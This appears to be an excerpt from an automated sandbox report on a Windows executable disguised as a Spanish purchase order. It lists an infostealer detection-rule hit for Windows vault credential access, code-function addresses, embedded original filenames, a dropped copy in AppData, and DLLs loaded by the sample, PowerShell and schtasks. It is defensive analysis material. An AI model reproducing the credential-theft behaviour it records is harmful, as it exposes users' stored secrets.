                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_050ED57C0_2_050ED57C
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071EA7900_2_071EA790
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E47100_2_071E4710
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E46FF0_2_071E46FF
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E2C000_2_071E2C00
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071EB4380_2_071EB438
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E34700_2_071E3470
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E34600_2_071E3460
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E30380_2_071E3038
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E30280_2_071E3028
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_071E50C00_2_071E50C0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_0722E5000_2_0722E500
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072221060_2_07222106
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072257280_2_07225728
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072257180_2_07225718
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072233E00_2_072233E0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_0722E9A80_2_0722E9A8
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_07223DE00_2_07223DE0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_07223DD10_2_07223DD1
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_07222C380_2_07222C38
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072240700_2_07224070
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 0_2_072240800_2_07224080
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_02CD4AA010_2_02CD4AA0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_02CD3E8810_2_02CD3E88
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_02CD41D010_2_02CD41D0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_02CDA98010_2_02CDA980
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8662810_2_06B86628
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B855E010_2_06B855E0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B87DD810_2_06B87DD8
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8B28810_2_06B8B288
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8309010_2_06B83090
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8C1F010_2_06B8C1F0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B876E010_2_06B876E0
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8E41810_2_06B8E418
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B85D1310_2_06B85D13
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8234010_2_06B82340
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8004010_2_06B80040
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeCode function: 10_2_06B8000610_2_06B80006
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_00F9D57C11_2_00F9D57C
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD9F4311_2_06CD9F43
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD470B11_2_06CD470B
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD471011_2_06CD4710
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD346B11_2_06CD346B
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD347011_2_06CD3470
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD50C011_2_06CD50C0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD303811_2_06CD3038
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD303711_2_06CD3037
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CD2C0011_2_06CD2C00
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06CDABF811_2_06CDABF8
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D1E50011_2_06D1E500
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D1210611_2_06D12106
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D1571811_2_06D15718
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D12C3811_2_06D12C38
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D13DD011_2_06D13DD0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D13DE011_2_06D13DE0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D1E9A811_2_06D1E9A8
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 11_2_06D1408011_2_06D14080
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_00DEE77915_2_00DEE779
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_00DE4AA015_2_00DE4AA0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_00DE3E8815_2_00DE3E88
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_00DE41D015_2_00DE41D0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_00DEA98015_2_00DEA980
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B662815_2_065B6628
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B7DD815_2_065B7DD8
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B55E015_2_065B55E0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065BB28815_2_065BB288
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B309015_2_065B3090
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065BC1F015_2_065BC1F0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B76E015_2_065B76E0
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065BE41815_2_065BE418
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B5D1315_2_065B5D13
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B234015_2_065B2340
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B004015_2_065B0040
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B02BF15_2_065B02BF
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeCode function: 15_2_065B000615_2_065B0006
                      Source: nOrden_de_compra.exe, 00000000.00000002.2116890255.0000000007E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGamma.dll8 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameattendant.dll> vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7d4a0f17-02c7-4030-b32d-7d2fecfc51d2.exe4 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2112238223.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGamma.dll8 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameattendant.dll> vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7d4a0f17-02c7-4030-b32d-7d2fecfc51d2.exe4 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4527068607.0000000000F59000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs nOrden_de_compra.exe
                      Source: nOrden_de_compra.exeBinary or memory string: OriginalFilenamerYwr.exe4 vs nOrden_de_compra.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeSection loaded: propsys.dllJump to behavior
